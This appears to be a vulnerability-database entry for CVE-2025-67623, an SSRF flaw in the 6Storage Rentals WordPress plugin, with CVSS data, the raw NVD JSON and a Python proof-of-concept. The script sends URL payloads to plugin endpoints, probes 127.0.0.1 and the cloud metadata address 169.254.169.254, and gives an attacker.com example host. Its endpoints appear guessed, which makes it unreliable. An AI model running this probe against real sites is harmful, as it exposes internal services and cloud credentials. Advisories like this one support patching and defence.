Security Vulnerability Report
中文
CVE-2025-67623 CVSS 5.4 MEDIUM

CVE-2025-67623

Published: 2025-12-24 13:16:19
Last Modified: 2026-04-27 18:16:47

Description

Server-Side Request Forgery (SSRF) vulnerability in 6Storage 6Storage Rentals 6storage-rentals allows Server Side Request Forgery.This issue affects 6Storage Rentals: from n/a through <= 2.22.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

6Storage Rentals (6storage-rentals) WordPress插件 <= 2.22.0
已知受影响版本:2.19.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-67623 - 6Storage Rentals SSRF PoC Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys def test_ssrf(target_url, attacker_server): """ Test for SSRF vulnerability in 6Storage Rentals plugin """ # Common WordPress plugin endpoint patterns endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/6storage/v1/', '/?rest_route=/6storage/v1/' ] # SSRF payload - attempt to make the server request our controlled endpoint ssrf_payload = { 'action': '6storage_fetch_data', 'url': attacker_server, 'endpoint': 'test' } print(f"[*] Testing SSRF on: {target_url}") print(f"[*] Attacker-controlled server: {attacker_server}") for endpoint in endpoints: full_url = target_url.rstrip('/') + endpoint try: response = requests.post( full_url, data=ssrf_payload, timeout=10, verify=False ) print(f"[+] Tested endpoint: {endpoint}") print(f" Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Failed to reach {endpoint}: {e}") # Internal network probing payload internal_targets = [ 'http://127.0.0.1/', 'http://169.254.169.254/latest/meta-data/', 'http://localhost/admin/' ] print("\n[*] Testing internal network access...") for target in internal_targets: ssrf_payload['url'] = target try: response = requests.post( target_url + endpoints[0], data=ssrf_payload, timeout=5, verify=False ) print(f"[+] Target: {target} - Status: {response.status_code}") except: pass if __name__ == '__main__': if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_url> <attacker_server>") print(f"Example: {sys.argv[0]} http://example.com http://attacker.com:8080") sys.exit(1) test_ssrf(sys.argv[1], sys.argv[2])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67623", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:18.583", "lastModified": "2026-04-27T18:16:46.670", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in 6Storage 6Storage Rentals 6storage-rentals allows Server Side Request Forgery.This issue affects 6Storage Rentals: from n/a through <= 2.22.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/6storage-rentals/vulnerability/wordpress-6storage-rentals-plugin-2-19-9-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}